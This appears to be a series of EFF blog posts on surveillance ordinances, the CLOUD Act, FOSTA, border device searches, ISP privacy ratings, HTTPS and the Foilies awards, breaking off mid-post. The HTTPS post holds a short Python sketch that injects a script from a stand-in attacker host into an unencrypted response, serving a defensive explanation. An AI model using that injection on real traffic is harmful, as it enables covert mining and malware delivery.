Berkeley’s City Council voted unanimously this week to pass the Surveillance Technology and Community Safety Ordinance into law. (This is an earlier draft of the ordinance. We’ll update this link when the approved version is published.) Berkeley joins Santa Clara County (which adopted a similar law in June of 2016) in showing the way for the rest of California. In addition to considerable and unopposed spoken support during the public comment portion of the hearing, Mayor Jesse Arreguín reported that he and the City Council had received almost 200 letters and emails asking for the law to be adopted.
EFF has long supported this ordinance. During this week’s public comment, Jason Kelley spoke not only as EFF’s digital strategist but as a local resident and community member. He shared that “my friends and I—many of whom live here—are concerned that surveillance tech might be purchased and used without proper oversight.”
The ordinance, part of a nationwide effort to require community control of police surveillance, will address the concerns Kelley and so many in the community share. The new law will require that before acquiring surveillance technology, city departments submit use policies and acquisition reports detailing what will be acquired and how it works. These reports must also outline potential impacts on civil liberties and civil rights as well as steps to ensure adequate security measures safeguarding the data collected or generated.
These requirements are particularly important in light of recent reports that Automated License Plate Reader (ALPR) data collected by police is being shared with ICE. In response to these reports, the City of Alameda recently voted against acquiring new ALPRs. During this week’s Berkeley city council meeting, the police chief stated that the Berkeley police department was not sharing any information acquired through their own ALPRs with third parties. The new ordinance will assure that equipment acquired in the future will be approved only after such policies have been made public and reviewed.
The meeting lasted into the late hours of the night, but the path to this important legislation has been more than a year in the making. EFF worked alongside dozens of local partners, including Oakland Privacy (a member of the Electronic Frontier Alliance), the ACLU, the Council on American-Islamic Relations, the Center for Media Justice, and Restore the Fourth.
With Santa Clara County and Berkeley now working diligently to protect the civil liberties of their residents, requiring public comment and city council approval on whether or not to acquire surveillance equipment, hope is high that similar ordinances will soon be passed in the cities of Davis and Oakland and by the Bay Area Rapid Transit system.
Technology has the power to improve our lives. It can make our government more accountable and efficient, and expose us to new information. But it also can intrude on our privacy and chill our free speech. Now more than ever, public safety requires trust between law enforcement and the community served. That trust is by necessity built on transparency and clear processes that balance public safety with the maintenance of the most essential of civil liberties. The Community Control of Police Surveillance ordinance model ensures all residents are afforded a voice in that process. Groups like Oakland Privacy in the Bay Area, and Privacy Watch in St. Louis, are working hard to see similar ordinances adopted in their communities. Visit the Electronic Frontier Alliance homepage to find or start an allied organization in your area.
Today the Marrakesh Treaty Implementation Bill was introduced into Congress by Senators Chuck Grassley (R-IA), Bob Corker (R-TN), Dianne Feinstein (D-CA), Bob Menendez (D-NJ), Kamala Harris (D-CA), Orrin Hatch (R-UT), and Patrick Leahy (D-VT). The bill implements the Marrakesh Treaty to Facilitate Access to Published Works for Persons Who Are Blind, Visually Impaired or Otherwise Print Disabled, a landmark treaty that was adopted by the World Intellectual Property Organization (WIPO) in June 2013, and has since been ratified by 37 other countries. The treaty is notable in that it is the first WIPO treaty passed primarily for a disadvantaged class of users, rather than for the benefit of copyright holders.
When passed, the bill will allow those who are blind, visually impaired, or otherwise reading disabled (for example, being unable to pick up and turn the pages of a book) to make free use of written works in accessible formats such as braille, large print, or audiobook. Although similar provisions were already part of U.S. law, the amendments made by this bill slightly broaden the class of beneficiaries who are eligible for access to such works.
Even more significantly, the implementation bill will ensure that it is legal for accessible works to be sent between the U.S. and other countries that are signatories to the Marrakesh Treaty. There are many blind, visually impaired, and print disabled users in countries that do not have the capacity to produce their own accessible works, reflected in the fact that such users in poor countries have access to only 1% of published books in accessible formats, compared with 7% in rich countries. Allowing eligible users throughout the world access to works that have been created in any other Marrakesh signatory countries is a compassionate and sensible solution to this "book famine."
The implementation bill tracks the Marrakesh Treaty closely, and it is not, as we had once feared, tied to the implementation of the much more problematic Beijing Treaty on Audiovisual Performances, which would require more significant changes to U.S. law. The National Federation of the Blind, libraries, publishers, the Copyright Office and the U.S. Patent and Trademark Office (USPTO) all support the Marrakesh Treaty Implementation Bill, and so does EFF. We wish the bill's sponsors success in seeing its speedy passage through Congress.
It’s Argentina's turn to take a closer look at the practices of their local Internet Service Providers, and how they treat their customers’ personal data when the government comes knocking.
Argentina's ¿Quien Defiende Tus Datos? (Who Defends Your Data?) is a project of Asociación por los Derechos Civiles and the Electronic Frontier Foundation, and is part of a region-wide initiative by leading Iberoamerican digital rights groups to turn a spotlight on how the policies of Internet Service Providers either advance or hinder the privacy rights of users.
The report is based on EFF's annual Who Has Your Back? report, but adapted to local laws and realities. Last year Brazil’s Internet Lab, Colombia’s Karisma Foundation, Paraguay's TEDIC, and Chile’s Derechos Digitales published their own 2017 reports, and ETICAS Foundation released a similar study earlier this year, part of a series across Latin America and Spain.
The report set out to examine which Argentine ISPs best defend their customers. Which are transparent about their policies regarding requests for data? Do any challenge disproportionate demands for their users’ data? Which require a judicial order before handing over personal data? Do any of the companies notify their users when complying with judicial requests? ADC examined publicly posted information, including the privacy policies and codes of practice, from six of the biggest Argentine telecommunications access providers: Cablevisión (Fibertel), Telefónica (Speedy), Telecom (Arnet), Telecentro, IPLAN, and DirecTV (AT&T). Between them, these providers cover 90% of the fixed and broadband market.
Each company was given the opportunity to answer a questionnaire, to take part in a private interview, and to send any additional information it felt appropriate, all of which was incorporated into the final report. ADC’s rankings for Argentine ISPs are below; the full report, which includes details about each company, is available at: https://adcdigital.org.ar/qdtd

Evaluation Criteria for ¿Quién Defiende tus Datos?
- Transparency: whether they publish transparency reports that are accessible to the public, including how many requests have been received, complied with, and rejected, with details about the type of requests, the government agencies that made them, and the reasons the authorities provided.
- Notification: whether they provide any kind of notification to customers of government data demands, with bonus points if the notification happens before the data is handed over.
- Judicial Order: whether they require the government to obtain a court order before handing over data, and whether they judicially resist data requests that are excessive or do not comply with legal requirements.
- Law Enforcement Guidelines: whether they publish their guidelines for law enforcement requests.
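To make the criteria concrete, here is a hypothetical sketch of how yes/no answers on the four criteria could be rolled up into a star rating. The company data, function name, and equal weighting below are invented for illustration; the actual QDTD report’s methodology may assign partial credit or weight criteria differently.

```python
# Hypothetical star-rating roll-up for the four QDTD criteria.
# The ISP answers below are invented for illustration only.
CRITERIA = ["transparency", "notification", "judicial_order", "guidelines"]

def stars(answers: dict) -> str:
    """One filled star per criterion met; partial credit is ignored here."""
    earned = sum(1 for c in CRITERIA if answers.get(c, False))
    return "★" * earned + "☆" * (len(CRITERIA) - earned)

example_isp = {"transparency": True, "judicial_order": True}
print(stars(example_isp))  # ★★☆☆
```

A roll-up like this makes year-over-year comparison easy, which is exactly why ADC and EFF plan to repeat the report annually.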
Companies in Argentina are off to a good start but still have a way to go to fully protect their customers’ personal data and be transparent about who has access to it. ADC and EFF expect to release this report annually to incentivize companies to improve transparency and protect user data. This way, all Argentines will have access to information about how their personal data is used and how it is controlled by ISPs so they can make smarter consumer decisions. We hope next year’s report will shine with more stars.
EFF filed an amicus brief last year in the case, arguing that the Supreme Court’s decision in Riley v. California (2014) supports the conclusion that border agents need a probable cause warrant before searching electronic devices because of the unprecedented and significant privacy interests travelers have in their digital data. In Riley, the Supreme Court followed similar reasoning and held that police must obtain a warrant to search the cell phone of an arrestee.
In U.S. v. Molina-Isidoro, although the Fifth Circuit declined to decide whether the Fourth Amendment requires border agents to get a warrant before searching travelers’ electronic devices, one judge invoked prior case law that could help us establish this privacy protection.
Ms. Molina-Isidoro attempted to enter the country at the port of entry at El Paso, TX. An x-ray of her suitcase led border agents to find methamphetamine. They then manually searched her cell phone and looked at her Uber and WhatsApp applications. The government sought to use her correspondence in WhatsApp in her prosecution, so she moved to suppress this evidence, arguing that it was obtained in violation of the Constitution because the border agents didn’t have a warrant.
Unfortunately for Molina-Isidoro, the Fifth Circuit ruled that the WhatsApp messages may be used in her prosecution. But the court avoided the main constitutional question: whether the Fourth Amendment requires a warrant to search an electronic device at the border. Instead, the court held that the border agents acted in “good faith”—an independent basis to deny Molina-Isidoro’s motion to suppress, even if the agents had violated the Fourth Amendment.
The Fifth Circuit presented two bases for its finding of “good faith”—factual and legal. The factual basis of the agents’ “good faith” was that there was probable cause to support a search of Molina-Isidoro’s phone. The finding of drugs in her luggage, according to the Fifth Circuit, “created a fair probability that the phone contained communications with the brother she supposedly visited (or whoever was the actual source of the drugs) and other information about her travel to refute the nonsensical story she had provided.” The legal basis of the agents’ “good faith” was pre-Riley case law that generally permits warrantless and suspicionless “routine” searches of items travelers carry across the border. While the court did not rule on whether Riley requires a warrant for border device searches, the court did emphasize that a leading Fourth Amendment legal treatise recognizes that “Riley may prompt a reassessment” of the question.
Additionally, Fifth Circuit Judge Gregg Costa issued an instructive concurring opinion. While he agreed with the decision to let the WhatsApp evidence stand, based on the border agents’ “good faith,” he made two key points we have made in our own briefs.
First, Judge Costa considered whether the traditional primary purpose of the Fourth Amendment’s border search exception—customs enforcement—justifies conducting warrantless, suspicionless searches of electronic devices. As we have argued, the link between these ends and means is very weak. Judge Costa agreed: “Detection of … contraband is the strongest historic rationale for the border search exception.” Yet, “Most contraband, the drugs in this case being an example, cannot be stored within the data of a cell phone.” He concluded, “this detection-of-contraband justification would not seem to apply to an electronic search of a cellphone or computer.” We made the same argument in our amicus brief: “Just as the Riley Court stated that ‘data on the phone can endanger no one,’ physical items cannot be hidden in digital data.”
Second, Judge Costa considered whether an “evidence-gathering justification” could support warrantless, suspicionless border searches of electronic devices. He questioned this, citing an 1886 Supreme Court customs case, Boyd v. U.S., which we also cited in our amicus brief. The Boyd Court held:
The search for and seizure of stolen or forfeited goods, or goods liable to duties and concealed to avoid the payment thereof, are totally different things from a search for and seizure of a man's private books and papers for the purpose of obtaining information therein contained, or of using them as evidence against him.
In other words, while border agents have an interest in preventing the importation of physical contraband, they have at most a much lesser interest in searching papers to find evidence of crime. Judge Costa seemed persuaded by this holding in Boyd, especially given the unprecedented privacy interests modern travelers have in their digital data, stating:
[Boyd’s] emphatic distinction between the sovereign’s historic interest in seizing imported contraband and its lesser interest in seizing records revealing unlawful importation has potential ramifications for the application of the border-search authority to electronic data that cannot conceal contraband and that, to a much greater degree than the papers in Boyd, contains information that is “like an extension of the individual’s mind”…
While we would have liked the Fifth Circuit to affirmatively hold that the Fourth Amendment bars a border search of a cell phone without a probable cause warrant, we’re optimistic that we can win such a ruling in our civil case against the U.S. Department of Homeland Security, Alasaad v. Nielsen, challenging warrantless border searches of electronic devices.
There’s a new, proposed backdoor to our data, one that would bypass our Fourth Amendment protections for communications privacy. It is built into a dangerous bill called the CLOUD Act, which would allow police at home and abroad to seize cross-border data without following the privacy rules of the place where the data is stored.
This backdoor is an insidious method for accessing our emails, our chat logs, our online videos and photos, and our private moments shared online with one another. This backdoor would deny us meaningful judicial review and the privacy protections embedded in our Constitution.
This new backdoor for cross-border data mirrors another backdoor under Section 702 of the FISA Amendments Act, an invasive NSA surveillance authority for foreign intelligence gathering. That law, recently reauthorized and expanded by Congress for another six years, gives U.S. intelligence agencies, including the NSA, FBI, and CIA, the ability to search, read, and share our private electronic messages without first obtaining a warrant.
The new backdoor in the CLOUD Act operates much in the same way. U.S. police could obtain Americans’ data, and use it against them, without complying with the Fourth Amendment.
For this reason, and many more, EFF strongly opposes the CLOUD Act.
The CLOUD Act (S. 2383 and H.R. 4943) has two major components. First, it empowers U.S. law enforcement to grab data stored anywhere in the world, without following foreign data privacy rules. Second, it empowers the president to unilaterally enter executive agreements with any nation on earth, even known human rights abusers. Under such executive agreements, foreign law enforcement officials could grab data stored in the United States, directly from U.S. companies, without following U.S. privacy rules like the Fourth Amendment, so long as the foreign police are not targeting a U.S. person or a person in the United States.
That latter component is where the CLOUD Act’s backdoor lives.
When foreign police use their power under CLOUD Act executive agreements to collect a foreign target’s data from a U.S. company, they might also collect data belonging to a non-target U.S. person who happens to be communicating with the foreign target. Given the many combined foreign investigations the CLOUD Act would allow, it is highly likely that such seizures will include Americans’ communications, including email, online chat, video calls, and internet voice calls.
Under the CLOUD Act’s rules for these data demands from foreign police to U.S. service providers, this collection of Americans’ data can happen without any prior, individualized review by a foreign or American judge. Also, it can happen without the foreign police needing to prove the high level of suspicion required by the U.S. Fourth Amendment: probable cause.
Once the foreign police have collected Americans’ data, they often will be able to hand it over to U.S. law enforcement, which can use it to investigate Americans, and ultimately to bring criminal charges against them in the United States.
According to the bill, foreign police can share the content of a U.S. person’s communications with U.S. authorities so long as it “relates to significant harm, or the threat thereof, to the United States or United States persons.” This standard is vague and overbroad. The bill’s own hypotheticals also indicate far-ranging data sharing by foreign police with U.S. authorities: from national security to violent crime, from organized crime to financial fraud, the CLOUD Act permits it all to be shared, and likely far more.
Moreover, the CLOUD Act allows the foreign police who collect Americans’ communications to freely use that content against Americans, and to freely share it with additional nations.
To review: The CLOUD Act allows the president to enter an executive agreement with a foreign nation known for human rights abuses. Using its CLOUD Act powers, police from that nation inevitably will collect Americans’ communications. They can share the content of those communications with the U.S. government under the flawed “significant harm” test. The U.S. government can use that content against these Americans. A judge need not approve the data collection before it is carried out. At no point need probable cause be shown. At no point need a search warrant be obtained.
This is wrong. Much like the infamous backdoor search loophole connected to broad, unconstitutional NSA surveillance under Section 702, the backdoor proposed in the CLOUD Act violates our Fourth Amendment right to privacy by granting unconstitutional access to our private lives online.
Also, when foreign police using their CLOUD Act powers inevitably capture metadata about Americans, they can freely share it with the U.S. government, without even showing “significant harm.” Communications “content” is the words in an email or online chat, the recordings of an internet voice call, or the moving images and coordinating audio of a video call online. Communications “metadata” is the pieces of information that relate to a message, including when it was sent, who sent it, who received it, its duration, and where the sender was located when sending it. Metadata is enormously powerful information and should be treated with the same protection as content.
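The content/metadata distinction is easy to see in a concrete record. In the hypothetical sketch below (the field names, addresses, and values are all invented for illustration), only the message body is “content”; every other field is metadata, and under the CLOUD Act that entire second group could be shared with U.S. authorities without even a “significant harm” showing.

```python
# A hypothetical message record, split into content vs. metadata.
message = {
    # "Content": the words of the communication itself.
    "body": "See you at the meeting tomorrow.",
    # "Metadata": everything describing the communication.
    "sender": "alice@example.com",
    "recipient": "bob@example.com",
    "sent_at": "2018-03-21T14:02:08Z",
    "duration_seconds": None,          # used for voice/video calls
    "sender_location": "41.88,-87.63", # where the sender was
}

CONTENT_FIELDS = {"body"}
metadata = {k: v for k, v in message.items() if k not in CONTENT_FIELDS}
print(sorted(metadata))  # every field except the message body
```

Even without the body, the remaining fields reveal who talked to whom, when, for how long, and from where, which is why metadata deserves the same protection as content.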
To be clear: the CLOUD Act fails to provide any limits on foreign police sharing Americans’ metadata with U.S. police.
The CLOUD Act would be a dangerous overreach into our data. It seeks to streamline cross-border police investigations, but it tears away critical privacy protections to attain that goal. This is not a fair trade. It is a new backdoor search loophole around the Fourth Amendment.
Tell your representative today to reject the CLOUD Act.
Stop the CLOUD Act
We have heard that the Allow States and Victims to Fight Online Sex Trafficking Act (FOSTA, H.R. 1865) may be on the U.S. Senate floor this week for a final vote. We are concerned that the U.S. Senate appears to be rushing to pass a seriously flawed bill without considering the impact it will have on Internet users and free speech.
We wrote Majority Leader Mitch McConnell and Democratic Leader Charles E. Schumer to share our concerns:
Websites and apps we all use every day - from WhatsApp and Instagram to Yelp and Wikipedia, even blogs and news websites with comment sections - rely on Section 230 (47 U.S.C § 230). Under Section 230, users are generally liable for the content they post, not the platforms. This bill would change that by expanding a platform's liability beyond its own actions - if this bill passes, online platforms would be responsible for their users' speech and behavior in addition to their own.
Current law, including Section 230, does not prevent federal prosecutors from going after online platforms that knowingly advertise sex trafficking. Additionally, courts have allowed civil claims against online platforms when a platform was shown to have a direct hand in creating the illegal content. New authorities are simply not needed to bring bad platforms or the pimps and "johns" who directly harmed victims to justice.
Section 230 can be credited with creating today's Internet. Congress made the deliberate choice to protect online free speech and innovation, while providing discrete tools to go after culpable platforms. Section 230 provided the legal buffer entrepreneurs needed to experiment with new ways to connect people online and is just as critical for today's startups as it was for today's popular platforms when they launched.
FOSTA would destroy the careful policy balance struck in Section 230. By opening platforms to increased criminal and civil liability at both the federal and state levels for user-generated content, the bill would incentivize those platforms to over-censor their users. Since it would be difficult if not impossible for platforms, both large and small, to review every post individually for sex trafficking content (or to definitively know whether a piece of online content reflects a sex trafficking situation in the offline world), platforms would have little choice but to adopt overly restrictive content moderation practices, silencing legitimate voices in the process. Trafficking victims themselves would likely be the first to be censored under FOSTA.
In addition to opening platforms to increased liability under civil law and state criminal law, FOSTA would also create new federal crimes designed to target online platforms. The expanded federal sex trafficking crimes would not require a platform owner to know that people are using the platform for sex trafficking, only to have "reckless disregard" of that fact. The Department of Justice already has a powerful legal tool to prosecute culpable online platforms: the SAVE Act of 2015 made it a crime under 18 U.S.C. § 1591 to advertise sexual services with knowledge that trafficking is taking place.
You can read the rest of the letter here.
We Still Need More HTTPS: Government Middleboxes Caught Injecting Spyware, Ads, and Cryptocurrency Miners
Last week, researchers at Citizen Lab discovered that Sandvine's PacketLogic devices were being used to hijack users' unencrypted internet connections, making yet another case for encrypting the web with HTTPS. In Turkey and Syria, users who were trying to download legitimate applications were instead served malicious software intended to spy on them. In Egypt, these devices injected money-making content into users' web traffic, including advertisements and cryptocurrency mining scripts.
These are all standard machine-in-the-middle attacks, where a computer on the path between your browser and a legitimate web server is able to intercept and modify your traffic data. This can happen if your web connections use HTTP, since data sent over HTTP is unencrypted and can be modified or read by anyone on the network.
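To make that concrete, here is a minimal sketch of the kind of rewrite an on-path middlebox can perform on an HTTP response. The page markup and the injected script URL are hypothetical, made up purely for illustration; the point is that plain HTTP includes no integrity check, so nothing stops a device on the path from altering the bytes before they reach the browser:

```python
# Hypothetical sketch: tampering with an unencrypted HTTP response.
# The HTML and the script URL below are invented for illustration.
original_response = "<html><body><a href='/setup.exe'>Download</a></body></html>"

def inject_script(html: str, script_url: str) -> str:
    # An on-path device can rewrite the response body in transit;
    # HTTP offers no integrity protection to detect the change.
    tag = f"<script src='{script_url}'></script>"
    return html.replace("</body>", tag + "</body>")

tampered = inject_script(original_response, "http://attacker.example/miner.js")
print("attacker.example" in tampered)  # the browser would run the injected script
```

With HTTPS, the TLS layer authenticates and integrity-protects the response, so this kind of in-flight modification fails rather than silently succeeding.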
Site operators can mitigate these attacks by using HTTPS instead of HTTP. And as a user, it's easy to see when a web page has been loaded over HTTPS—check for “https” at the beginning of the URL or, on most common browsers, a green lock icon displayed next to the address bar. However, it can still be hard to tell when you're downloading files insecurely. For instance, Avast's website was hosted over HTTPS, but their downloads were not.
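As a rough illustration of that last point, one simple guard is to check a download link's scheme before fetching it. This is a hedged sketch only (the URLs are placeholders, not any vendor's real download links), and a scheme check is necessary but not sufficient; the whole chain, page and file alike, must be served over HTTPS:

```python
from urllib.parse import urlparse

def is_protected_in_transit(url: str) -> bool:
    # Only an https:// URL gives the transfer confidentiality and
    # integrity on the wire; a plain-http file can be swapped out
    # by a middlebox without the user noticing.
    return urlparse(url).scheme == "https"

print(is_protected_in_transit("https://example.com/page"))      # True
print(is_protected_in_transit("http://example.com/setup.exe"))  # False
```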
Today, Let’s Encrypt and Certbot make it easier than ever to deploy HTTPS websites and to serve content securely. And later this year, Chrome is planning on marking all HTTP sites as “not secure”. Thanks to these collective efforts and many more, almost 80% of web traffic in the U.S. is now encrypted with HTTPS. If you want to be sure you’re browsing securely, EFF’s HTTPS Everywhere browser extension can force your browser to use it wherever possible.
We've come a long way with HTTPS adoption since 2010, when EFF first started pushing tech companies to support it. Evidently, we still have a long way to go.
EFF and 23 other civil liberties organizations sent a letter to Congress urging Members and Senators to oppose the CLOUD Act and any efforts to attach it to other legislation.
The CLOUD Act (S. 2383 and H.R. 4943) is a dangerous bill that would tear away global privacy protections by allowing police in the United States and abroad to grab cross-border data without following the privacy rules of where the data is stored. Currently, law enforcement requests for cross-border data often use a legal system called the Mutual Legal Assistance Treaties, or MLATs. This system ensures that, for example, should a foreign government wish to seize communications stored in the United States, that data is properly secured by the Fourth Amendment requirement for a search warrant.
The other groups signing the new coalition letter against the CLOUD Act are Access Now, Advocacy for Principled Action in Government, American Civil Liberties Union, Amnesty International USA, Asian American Legal Defense and Education Fund (AALDEF), Campaign for Liberty, Center for Democracy & Technology, CenterLink: The Community of LGBT Centers, Constitutional Alliance, Defending Rights & Dissent, Demand Progress Action, Equality California, Free Press Action Fund, Government Accountability Project, Government Information Watch, Human Rights Watch, Liberty Coalition, National Association of Criminal Defense Lawyers, National Black Justice Coalition, New America's Open Technology Institute, OpenMedia, People For the American Way, and Restore The Fourth.
The CLOUD Act allows police to bypass the MLAT system, removing vital U.S. and foreign country privacy protections. As we explained in our earlier letter to Congress, the CLOUD Act would:
- Allow foreign governments to wiretap on U.S. soil under standards that do not comply with U.S. law;
- Give the executive branch the power to enter into foreign agreements without Congressional approval or judicial review, including foreign nations with a well-known record of human rights abuses;
- Possibly facilitate foreign government access to information that is used to commit human rights abuses, like torture; and
- Allow foreign governments to obtain information that could pertain to individuals in the U.S. without meeting constitutional standards.
You can read more about EFF’s opposition to the CLOUD Act here.
The CLOUD Act creates a new channel for foreign governments seeking data about non-U.S. persons who are outside the United States. This new data channel is not governed by the laws of where the data is stored. Instead, the foreign police may demand the data directly from the company that handles it. Under the CLOUD Act, should a foreign government request data from a U.S. company, the U.S. Department of Justice would not need to be involved at any stage. Also, such requests for data would not need to receive individualized, prior judicial review before the data request is made.
The CLOUD Act’s new data delivery method lacks not just meaningful judicial oversight but meaningful Congressional oversight as well. Should the U.S. executive branch enter a data exchange agreement—known as an “executive agreement”—with a foreign country, Congress would have little time and power to stop it. As we wrote in our letter:
“[T]he CLOUD Act would allow the executive branch to enter into agreements with foreign governments—without congressional approval. The bill stipulates that any agreement negotiated would go into effect 90 days after Congress was notified of the certification, unless Congress enacts a joint resolution of disapproval, which would require presidential approval or sufficient votes to overcome a presidential veto.”
And under the bill, the president could agree to enter executive agreements with countries that are known human rights abusers.
Troublingly, the bill also fails to protect U.S. persons from the predictable, non-targeted collection of their data. When foreign governments request data from U.S. companies about specific “targets” who are non-U.S. persons not living in the United States, these governments will also inevitably collect data belonging to U.S. persons who communicate with the targeted individuals. Much of that data can then be shared with U.S. authorities, who can then use the information to charge U.S. persons with crimes. That data sharing, and potential criminal prosecution, requires no probable cause warrant as required by the Fourth Amendment, violating our constitutional rights.
The CLOUD Act is a bad bill. We urge Congress to stop it, and any attempts to attach it to must-pass spending legislation.
Stop the CLOUD Act
Government transparency laws like the Freedom of Information Act exist to enforce the public’s right to inspect records so we can all figure out what the heck is being done in our name and with our tax dollars.
But when a public agency ignores, breaks or twists the law, your recourse varies by jurisdiction. In some states, when an official improperly responds to your public records request, you can appeal to a higher bureaucratic authority or seek help from an ombudsperson. In most states, you can take the dispute to court.
Public shaming and sarcasm, however, are tactics that can be applied anywhere.
The California-based news organization Reveal tweets photos of chickpeas or coffee beans to represent each day a FOIA response is overdue, and asks followers to guess how many there are. The alt weekly DigBoston has sent multiple birthday cakes and edible arrangements to local agencies on the one-year anniversary of delayed public records requests. And here, at the Electronic Frontier Foundation, we give out The Foilies during Sunshine Week, an annual celebration of open-government advocacy.
In its fourth year, The Foilies recognizes the worst responses to records requests, outrageous efforts to stymie transparency and the most absurd redactions. These tongue-in-cheek pseudo-awards are hand-chosen by EFF’s team based on nominations from fellow transparency advocates, participants in #FOIAFriday on Twitter, and, in some cases, our own personal experience.
If you haven’t heard of us before, EFF is a nonprofit based in San Francisco that works on the local, national and global level to defend and advance civil liberties as technology develops. As part of this work, we file scores of public records requests and take agencies like the U.S. Department of Justice, the Department of Homeland Security, and the Los Angeles Police Department to court to liberate information that belongs to the public.
Because shining a spotlight is sometimes the best litigation strategy, we are pleased to announce the 2018 winners of The Foilies.
Quick links to the winners:
- The Mulligan Award - Pres. Donald J. Trump
- FOIA Fee of the Year - Texas Department of Criminal Justice
- Best Set Design in a Transparency Theater Production - Atlanta Mayor Kasim Reed
- Special Achievement for Analog Conversion - Former Seattle Mayor Ed Murray
- The Winger Award for FOIA Feet Dragging - FBI
- The Prime Example Award – Midcoast Regional Redevelopment Authority (Maine)
- El Premio del Desayuno Más Redactado - CIA
- The Courthouse Bully Award - Every Agency Suing a Requester
- The Lawless Agency Award - U.S. Customs and Border Protection
- The Franz Kafka Award for Most Secrets About Secretive Secrecy - CIA
- Special Recognition for Congressional Overreach - U.S. House of Representatives
- The Data Disappearance Award - Trump Administration
- The Danger in the Dark Award - The Army Corps of Engineers
- The Business Protection Agency Award - The Food and Drug Administration
- The Exhausted Mailman Award - Bureau of Indian Affairs
- Crime & Punishment Award - Martin County Commissioners (Florida)
- The Square Footage Award - Jacksonville Sheriff’s Office (Florida)
- These Aren’t the Records You’re Looking For Award - San Diego City Councilmember Chris Cate
The Mulligan Award - Pres. Donald J. Trump
Since assuming the presidency, Donald Trump has skipped town more than 55 days to visit his Mar-a-Lago resort in Florida, according to sites like trumpgolfcount.com and NBC. He calls it his “Winter White House,” where he wines and dines and openly strategizes with the Japanese prime minister over how to respond to North Korean ballistic missile tests, for all his paid guests to see and post on Facebook. The fact that Trump’s properties have become secondary offices and remain a source of income for his family raises significant questions about transparency, particularly if club membership comes with special access to the president. To hold the administration accountable, Citizens for Responsibility and Ethics in Washington filed a FOIA request for the visitor logs, but received little in response. CREW sued and, after taking another look, the Secret Service provided details about the Japanese leader’s entourage. As Politico and others reported, the Secret Service ultimately admitted they’re not actually keeping track. The same can’t be said about Trump’s golf score.
FOIA Fee of the Year - Texas Department of Criminal Justice
Sexual assault in prison is notoriously difficult to measure due to stigma, intimidation, and apathetic bureaucracy. Nevertheless, MuckRock reporter Nathanael King made a valiant effort to find out whatever he could about these investigations in Texas, a state once described by the Dallas Voice as the “Prison Rape Capital of the U.S.” However, the numbers that the Texas Department of Criminal Justice came back with weren’t quite what he was expecting. TDCJ demanded he fork over a whopping $1,132,024.30 before the agency would release 260,000 pages of records that it said would take 61,000 hours of staff time to process. That in itself may be an indicator of the scope of the problem. However, to the agency’s credit, they pointed the reporter in the direction of other statistical records compiled to comply with the federal Prison Rape Elimination Act, which TDCJ provided for free.
Best Set Design in a Transparency Theater Production - Atlanta Mayor Kasim Reed
“Transparency theater” is the term we use to describe an empty gesture meant to look like an agency is embracing open government, when really it’s meant to obfuscate. For example, an agency may dump an overwhelming number of documents and put them on display for cameras. But because there are so many records, the practice actually subverts transparency by making it extremely difficult to find the most relevant records in the haystack.
Such was the case with Atlanta Mayor Kasim Reed, who released 1.476 million documents about a corruption probe to show his office was supporting public accountability.
“The documents filled hundreds of white cardboard boxes, many stacked up waist high against walls and spread out over rows of tables in the cavernous old City Council chamber,” Atlanta Journal-Constitution reporter Leon Stafford wrote. “Reed used some of the boxes as the backdrop for his remarks, creating a six-foot wall behind him.”
Journalists began to dig through the documents and quickly discovered that many were blank pages or fully redacted, and in some cases the type was too small for anyone to read. AJC reporter J. Scott Trubey’s hands became covered in papercut gore. Ultimately, the whole spectacle was a waste of trees: The records already existed in a digital format. It’s just that a couple of hard drives on a desk don’t make for a great photo op.
Special Achievement for Analog Conversion - Former Seattle Mayor Ed Murray
In the increasingly digital age, more and more routine office communication is occurring over mobile devices. With that in mind, transparency activist Phil Mocek filed a request for text messages (and other app communications) sent or received by now-former Seattle Mayor Ed Murray and many of his aides. The good news is the city at least partially complied. The weird news is that rather than seek the help of an IT professional to export the text messages, some staff simply plopped a cell phone onto a photocopier. Mocek tells EFF he’s frustrated that the mayor’s office refused to search their personal devices for relevant text messages. They argued that city policy forbids using personal phones for city business—and of course, no one would violate those rules. However, we’ll concede that thwarting transparency is probably the least of the allegations against Murray, who resigned in September 2017 amid a child sex-abuse scandal.
The Winger Award for FOIA Feet Dragging - FBI
Thirty years ago, the hair-rock band Winger released “Seventeen”—a song about young love that really hasn’t withstood the test of time. Similarly, the FBI’s claim that it would take 17 years to produce a series of records about civil rights-era surveillance also didn’t withstand the judicial test of time.
As Politico reported, George Washington University professor and documentary filmmaker Nina Seavey asked for records about how the FBI spied on antiwar and civil rights activists in the 1960s and 1970s. The FBI claimed they would only process 500 pages a month, which would mean the full set of 110,000 pages wouldn’t be complete until 2034.
Just as Winger’s girlfriend’s dad disapproved in the song, so did a federal judge, writing in her opinion: “The agency's desire for administrative convenience is simply not a valid justification for telling Professor Seavey that she must wait decades for the documents she needs to complete her work.”
The Prime Example Award – Midcoast Regional Redevelopment Authority (Maine)
When Amazon announced last year that it was seeking a home for its second headquarters, municipalities around the country rushed to put together proposals to lure the tech giant to their region. Knowing the substantial footprint Amazon has left on its home community in Seattle (particularly around housing), transparency organizations like MuckRock and the Lucy Parsons Labs followed up with records requests for these cities’ sales pitches.
More than 20 cities, such as Chula Vista, California, and Toledo, Ohio, produced the records—but other agencies, including Albuquerque, New Mexico, and Jacksonville, Florida, refused to turn over the documents. The excuses varied, but perhaps the worst response came from Maine’s Midcoast Regional Redevelopment Authority. The agency did provide the records, but claimed that by opening an email containing 37 pages of documents, MuckRock had automatically agreed to pay an exorbitant $750 in “administrative and legal fees.” Remind us to disable one-click ordering.
El Premio del Desayuno Más Redactado - CIA
Buzzfeed reporter Jason Leopold has filed thousands of records requests over his career, but one redaction has become his all-time favorite. Leopold was curious whether CIA staff are assailed by the same stream of office announcements as every other workplace. So, he filed a FOIA request—and holy Hillenkoetter, do they. Deep in the document set was an announcement that “the breakfast burritos are back by popular demand,” with a gigantic redaction covering half the page citing a personal privacy exemption. What are they hiding? Is Anthony Bourdain secretly a covert agent? Did David Petraeus demand extra guac? This could be the CIA’s greatest Latin American mystery since Nicaraguan Contra drug-trafficking.
The Courthouse Bully Award - Every Agency Suing a Requester
As director of the privacy advocacy group We See You Watching Lexington, Michael Maharrey filed a public records request to find out how his city was spending money on surveillance cameras. After the Lexington Police Department denied the request, he appealed to the Kentucky Attorney General’s office—and won.
Rather than listen to the state’s top law enforcement official, Lexington Police hauled Maharrey into court.
